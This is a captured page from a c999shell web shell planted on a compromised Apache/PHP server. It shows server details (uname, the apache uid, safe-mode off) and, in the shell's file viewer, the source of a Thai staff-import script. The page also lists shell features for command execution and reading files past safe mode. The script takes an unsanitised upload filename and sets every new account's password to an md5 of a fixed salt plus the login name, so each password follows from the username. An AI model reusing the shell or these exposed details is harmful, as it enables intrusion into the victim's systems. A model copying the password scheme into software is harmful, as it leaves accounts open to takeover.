Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/eperson/admin/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <?php
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../link/function.php";
include_once "../class/clsTable.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../class/clsUmuser.php";
include_once "../class/clsUmUserGroup.php";
$oUs = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_UMS'], $GLOBALS['DBUSER_UMS'], $GLOBALS['DBPASS_UMS']);
$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EPERSON'], $GLOBALS['DBUSER_EPERSON'], $GLOBALS['DBPASS_EPERSON']);
$oDP = new Department($oC);
$oPS = new Person($oC);
$oUms= new umuser($oUs);
$oUms2= new umuser($oUs);
$oUg=new umusergroup($oUs);
if($method=="addperson"){
$flagCommit = true;
$checkflagCommit="0";
$oC->BeginTrans();
$oUs->BeginTrans();
//------------add person-------------------------
$UPath='uploadfile/'.$filename;
$fp = fopen($UPath, "r");
while(!feof($fp)) {
$char = fgets($fp);
list($prefixId, $name, $surname, $deptId, $loginname,$adminId,$hireId) = split('[,]', $char);
$prefixId = rtrim($prefixId);
$name = rtrim($name);
$surname = rtrim($surname);
$deptId= rtrim($deptId);
$loginname=substr(strtolower(rtrim($loginname)),0,8);
$adminId = rtrim($adminId);
$hireId= rtrim($hireId);
if($prefixId!="" && $name!="" && $surname!="" && $deptId!="" && $loginname!="" && $adminId!="" && $hireId!=""){
//---------------------------add data to people
//echo "+++++people table<br>";
$oPS->AddNew();
if($oPS->GetNextCode()==1){
$j=2;
}else{
$j=$oPS->GetNextCode();
}
$oPS->personId=$j;
//echo "personId".$oPS->personId."<br>";
$oPS->prefixId=$prefixId;
//echo "prefixId".$oPS->prefixId."<br>";
$oPS->fName=$name;
//echo "fName".$oPS->fName."<br>";
$oPS->lName=$surname;
//echo "lName".$oPS->lName."<br>";
$oPS->receiveDate=$oPS->receiveDate;
//echo "receiveDate".$oPS->receiveDate."<br>";
$oPS->pId=$oPS->pId;
//echo "pId".$oPS->pId."<br>";
$oPS->adlineId=$oPS->adlineId;
//echo "adlineId".$oPS->adlineId."<br>";
$oPS->adminposId=$oPS->adminposId;
//echo "adminposId".$oPS->adminposId."<br>";
$oPS->hireId=$hireId;
//echo "hireId".$oPS->hireId."<br>";
$oPS->majortypeId=$oPS->majortypeId;
//echo "majortypeId".$oPS->majortypeId."<br>";
$oPS->levelposId=$oPS->levelposId;
//echo "levelposId".$oPS->levelposId."<br>";
$oPS->stepSal=$oPS->stepSal;
//echo "stepSal".$oPS->stepSal."<br>";
$oPS->salary=$oPS->salary;
//echo "salary".$oPS->salary."<br>";
$oPS->partyId=$oPS->partyId;
//echo "partyId".$oPS->partyId."<br>";
$oPS->deptId=$deptId;
//echo "deptId".$oPS->deptId."<br>";
$oPS->majorId=$oPS->majorId;
//echo "majorId".$oPS->majorId."<br>";
$oPS->assignId=$oPS->assignId;
//echo "assignId".$oPS->assignId."<br>";
$oPS->promoteDate=$oPS->promoteDate;
//echo "promoteDate".$oPS->promoteDate."<br>";
$oPS->educDate=$oPS->educDate;
//echo "educDate".$oPS->educDate."<br>";
$oPS->posDate=$oPS->posDate;
//echo "posDate".$oPS->posDate."<br>";
$oPS->fullsalDate=$oPS->fullsalDate;
//echo "fullsalDate".$oPS->fullsalDate."<br>";
$oPS->typemoveId=$oPS->typemoveId;
//echo "typemoveId".$oPS->typemoveId."<br>";
$oPS->fyDecor=$oPS->fyDecor;
//echo "fyDecor".$oPS->fyDecor."<br>";
$oPS->lastDecor=$oPS->lastDecor;
//echo "lastDecor".$oPS->lastDecor."<br>";
$oPS->fRetire="0";
//echo "fRetire".$oPS->fRetire."<br>";
$oPS->adminId=$adminId;
//echo "adminId".$oPS->adminId."<br>";
$oPS->done=$oPS->done;
//echo "done".$oPS->done."<br>";
$oPS->accountNo=$oPS->accountNo;
//echo "accountNo".$oPS->accountNo."<br>";
$oPS->useSalary=$oPS->useSalary;
//echo "useSalary".$oPS->useSalary."<br>";
$oPS->personCode=$oPS->personCode;
//echo "personCode".$oPS->personCode."<br>";
$oPS->oldpersonCode=$oPS->oldpersonCode;
//echo "oldpersonCode".$oPS->oldpersonCode."<br>";
$oPS->admidYear=$oPS->admidYear;
//echo "admidYear".$oPS->admidYear."<br>";
$oPS->partyAtId=$oPS->partyAtId;
//echo "partyAtId".$oPS->partyAtId."<br>";
$oPS->partypracticeId=$oPS->partypracticeId;
//echo "partypracticeId".$oPS->partypracticeId."<br>";
$oPS->firstadmidDate=$oPS->firstadmidDate;
//echo "firstadmidDate".$oPS->firstadmidDate."<br>";
$oPS->posDegree=$oPS->posDegree;
//echo "posDegree".$oPS->posDegree."<br>";
$oPS->posEducmajor=$oPS->posEducmajor;
//echo "posEducmajor".$oPS->posEducmajor."<br>";
$oPS->enterType=$oPS->enterType;
//echo "enterType".$oPS->enterType."<br>";
$oPS->fStatus="1";
//echo "fStatus".$oPS->fStatus."<br>";
$oPS->salary2=$oPS->salary2;
//echo "salary2".$oPS->salary2."<br>";
$oPS->fullStep=$oPS->fullStep;
//echo "fullStep".$oPS->fullStep."<br>";
$oPS->levelposId2=$oPS->levelposId2;
//echo "levelposId2".$oPS->levelposId2."<br>";
$oPS->stepSal2=$oPS->stepSal2;
//echo "stepSal2".$oPS->stepSal2."<br>";
$oPS->useSalary2=$oPS->useSalary2;
//echo "useSalary2".$oPS->useSalary2."<br>";
$flagCommit = $oPS->Save();
if(!$flagCommit){ $checkflagCommit="1"; }
//---------------------------add data to ums
//echo "+++++umuser<br>";
$oUms->AddNew();
$oUms->UsID=$oUms->GetNextCode();
//echo "UsID".$oUms->UsID."<br>";
$oUms->UsName=$name." ".$surname;
//echo "UsName".$oUms->UsName."<br>";
$oUms->UsLogin=$loginname;
//echo "UsLogin".$oUms->UsLogin."<br>";
$oUms->UsPassword=md5("O]O57".strtolower(rtrim($loginname))."7O[O");
$oUms->UsPsCode=$oPS->personId;
//echo "UsPsCode".$oUms->UsPsCode."<br>";
//echo "personId".$oPe->personId."<br>";
$oUms->UsWgID=$oUms->UsWgID;
$oUms->UsQsID=$oUms->UsQsID;
$oUms->UsAnswer=$oUms->UsAnswer;
$oUms->UsEmail=$oUms->UsEmail;
$oUms->UsActive=$oUms->UsActive;
$oUms->UsAdmin=$oUms->UsAdmin;
$oUms->UsDesc=$oUms->UsDesc;
$oUms->UsPwdExpDt=$oUms->UsPwdExpDt;
$oUms->UsUpdDt=$oUms->UsUpdDt;
$oUms->UsUpdUsID=$oUms->UsUpdUsID;
$oUms->UsSessionID=$oUms->UsSessionID;
$flagCommit = $oUms->Save();
if(!$flagCommit){ $checkflagCommit="1"; }
//---------------------------add data to umusergroup
//echo "+++++umusergroup <br>";
$oUg->AddNew();
$oUg->UgID=$oUg->GetNextCode();
//echo "UsID".$oUg->UgID."<br>";
$oUg->UgGpID="108"; //ผู้ใข้ทั่วไปของสารบรรณ
//echo "UgGpID".$oUg->UgGpID."<br>";
$oUg->UgUsID=$oUms->UsID;
//echo "UgUsID".$oUg->UgUsID."<br>";
$flagCommit = $oUg->Save();
if(!$flagCommit){ $checkflagCommit="1"; }
//echo "--------------------------------<br>";
} //if not null
} //while
if($checkflagCommit=="0"){
$oC->CommitTrans();
$oUs->CommitTrans();
}else{
$oC->RollbackTrans();
$oUs->RollbackTrans();
}
}
echo "<meta http-equiv='refresh' content='0; URL=ImportPsExcel.php?success=1'>";
?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |